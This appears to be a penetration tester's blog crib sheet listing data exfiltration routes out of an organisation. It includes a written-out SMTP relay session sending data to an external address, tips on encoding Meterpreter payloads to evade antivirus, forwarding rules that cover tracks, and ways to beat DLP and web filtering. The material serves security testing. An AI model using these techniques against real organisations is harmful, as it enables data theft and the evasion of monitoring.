Data exfiltration techniques

Data exfiltration is the last stage of the kill chain in a (generally) targeted attack on an organisation. Whilst many excellent papers and tools are available for various techniques this is our attempt to pull all these together. This could also be used as a crib sheet for fellow pen testers who are asked to check an organisation for ease of exfiltration.

Most of the techniques described relate to direct internal to external data exfiltration, although in many cases an organisation’s network segmentation will require an attacker to aggregate data to a staging point before this can take place.

It’s by no means exhaustive, so if we’ve missed something let us know and we’ll be happy to credit you!

Index

• Web
• Email
• Malware
• Protocol Abuse
• Internal Staging
• File Types
• Physical
• Airgaps

Web

Back To Index▲

1. Many organisations don’t have any kind of web proxying in place, and if that’s the case your work is likely done.
2. Anon paste sites like pastebin or even github offer an easy exfiltration channel. Github is often permitted in many technical organisations.
3. If there is proxying and filtering you may need to work a little harder, but many common sites like Dropbox, Google Drive and Box are permitted, especially if an organisation outsources to shared cloud services.
4. Often TLS interception (man-in-the-middle) isn’t enabled. Spin up a custom domain somewhere, coupled with LetsEncrypt, and you’re away.
5. Even if something like Websense is enabled, many categories aren’t enabled for full TLS inspection – things like financial and medical – for employees’ privacy. Many categorisation systems allow you to suggest your own appropriate category and so with a little pre-planning an attacker can stage their own healthcare site ready to bypass the filters.
6. Are Flickr and YouTube accesible? Relatively large files can be staged using these services, including using steganography.
7. Perhaps your organisation hosts its own web servers, accessible from the internet. Can you compromise one of these and use it as a staging post?

Email

Back To Index▲

1. Can you get to one of the main webmail providers – Gmail, Outlook.com etc? This is made more likely if, again, your target organisation has outsourced to Office 365 or GSuite (check their MXs or mail headers).
2. Is outbound SMTP/POP3/IMAP available. Check both unencrypted and encrypted ports – 25/465/587, 110/995, 143/993.
3. Are there misconfigured mail relays on site? Can you relay to external addresses by spoofing internal ones? (This is also a good one for internal phishing that bypassess message hygiene filters, but that’s a story for another day!).

   #telnet internal.smtp.local 25
   HELO attacker
   MAIL FROM:<[email protected]>
   RCPT TO:<[email protected]>
   DATA
   Here is lots of confidential data
   .
   QUIT

   Obviously, this is a potentially noisy route, especially for lots of data, but it will do in a pinch.

4. A trickier, but potentially less obvious one is if a mailbox has been compromised (so, post-phish) that an attacker can setup autoforward rules in Outlook to an external address of their choosing. Often very useful against high value targets. Same rules can be used to delete the sent item, covering tracks.

Malware

Back To Index▲

Meterpreter over HTTP/HTTPS/DNS

Meterpreter which is part of the Metasploit framework uses multi-staged payloads which is a small piece of code that allocates memory and opens network ports to communicate with the framework and executes the rest of the payload. https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

To overcome AntiVirus and Network intrusion detection you can use several encoders (e.g. Shikata Ga Nai) which are part of the Metasploit framework. When having a working payload, avoid uploading it to VirusTotal or any other online scanners, as they hand everything over to AV Companies. https://www.offensive-security.com/metasploit-unleashed/msfencode/

Protocol Abuse

Back To Index▲

So by this point, things are starting to get a bit trickier, but let’s try some of the easier tools first:

1. FTP/SSH/SCP/SFTP might be permitted outbound, or at least most likely will be from some locations as they’re often used as data exchange protocols. Client tools are also readily available on systems without the need to pull down additional binaries.
2. DNS tunneling is very often successful as it’s difficult to block outright, although good organisations will have monitoring in place to detect it afterwards. The fabulous dnscat2 is very easy to get up and running.
3. Some IDS/IDPs are now capable of spotting DNS tunnelling, but often miss data sent via DNS TXT records. We made a tool to help you serve files through these: https://github.com/pentestpartners/Uninvited-Guest, there’s also an earlier, more raw version https://github.com/pentestpartners/DNSTXT-encoder.
4. Unlikely, but you could try raw TCP sockets. More likely is that ICMP is allowed outbound (it’s a useful diagnostic tool and important in IPv6) – it’s pretty slow though. https://github.com/sensepost/DET
5. Packet headers can also be used to smuggle data out https://github.com/omkartotade/Data-Exfiltration
6. Old-school port knocking is also an option https://www.sans.org/reading-room/whitepapers/covert/portknockout-data-exfiltration-port-knocking-udp-37307
7. Are P2P protocols like bittorrent available?
8. Tor and domain fronting are also a great way to bypass filters where HTTPS inspection is not looking for a mismatch between outer and inner names https://blog.didierstevens.com/2018/01/20/quickpost-data-exfiltration-with-tor-browser-and-domain-fronting/
9. Many instant message protocols like Skype, Facebook Messenger and IRC can also be leveraged. My organisation uses Skype for Business and enables federation with “regular” Skype and other domains. https://www.sans.org/reading-room/whitepapers/covert/skype-data-exfiltration-34560
10. NTP and BGP protocols are often permitted and can be abused to exfiltrate data https://www.darknet.org.uk/2016/11/pyexfil-python-data-exfiltration-tools/
11. Remote Desktop can often be used to map drives and the clipboard, but even if these are restricted, PTP Rat can help by sending data through the screen.
12. X509 certificates can embed binary data which can therefore be used to transmit data https://github.com/fideliscyber/x509

Internal Staging

Back To Index▲

1. WMI calls can be used to initiate transfers, set alternate data streams or take shadow volume copies to hide data on staging systems https://github.com/secabstraction/WmiSploit
2. Windows BITS can be used to schedule transfers or trickle transfer information to avoid “top talkers” triggers.

File Types

Back To Index▲

A valid exfiltration protocol might exist, eg email, but DLP may spot data signatures and block subsequent transfers. Try encapsulating your data in the following file types to bypass DLP:

• Plain Zip
• Password protected (AES) Zip
• Deeply nested Zips (many systems will stop scanning after 10-100 to avoid Zip Bombs)
• 7zip
• RAR
• CAB
• Tar (+/- gzip)
• WIM image

Physical

Back To Index▲

If an attacker or malicious insider has physical access, then various options are open.

1. Are laptop and workstation USB ports locked down, including to MP3 players and smartphones. Are only approved/managed encrypted USB sticks allowed to connect?
2. They’re getting less frequent on business machines these days but optical drives may permit writing to CDs and DVDs. They are harder to smuggle out larger volumes of data than USB.
3. Do your laptop asset stickers give away the organisation? Do portable devices have full disk encryption? Are any poorly-disposed-of machines available in the trash or on eBay?
4. Printing is likely to be available in most organisations, and many multi-functional printers can themselves be exploited to retrieve previous print jobs, or even transmit data out via the fax line. http://seclists.org/bugtraq/2016/Sep/54
5. Can an attacker close-by compromise corporate Wi-Fi, especially if WPA-PSK is in use. Are guest Wi-Fi networks sufficiently segregated from the main corporate network? Are corporate systems prevented from connecting to guest Wi-Fi, with insufficient isolation?
6. Can an attacker take advantage of weak edge port security to implant a device on the network, like a Raspberry Pi with its own cellular out of band command connection?
7. Webcam
8. Mobile Phones
9. Hard copies

Airgaps

Back To Index▲

• Bluetooth capable devices can be targeted although air-gapped. Malicious attacks like taking control of devices or spreading malware within range of devices. https://blog.malwarebytes.com/cybercrime/2017/09/blueborne-bluetooths-airborne-influenza/
• PC speakers: By reversing connected speakers into microphones by exploiting a specific audio chip feature. This device performs as microphones into a listening device. https://thehackernews.com/2018/03/air-gap-computer-hacking.html
• Optical: Stealing data from an air-gapped device by using the hard drive’s indicator LEDs which can be controlled at up to 6000 blinks per second. https://www.wired.com/2017/02/malware-sends-stolen-data-drone-just-pcs-blinking-led/
• Magnetic: Exfiltration of data via magnetic signals generated by the computer processors. These attacks use low frequency magnetic fields and hence bypass Faraday shielding.
• Power Lines: Exfiltrating Data from Air-Gapped Computers through Power Lines
• “Fansmitter “- commandeering the computer’s fan and modifying its rotation rate to control the sound it produces. https://www.technologyreview.com/s/601816/how-fansmitter-malware-steals-data-from-air-gapped-computers/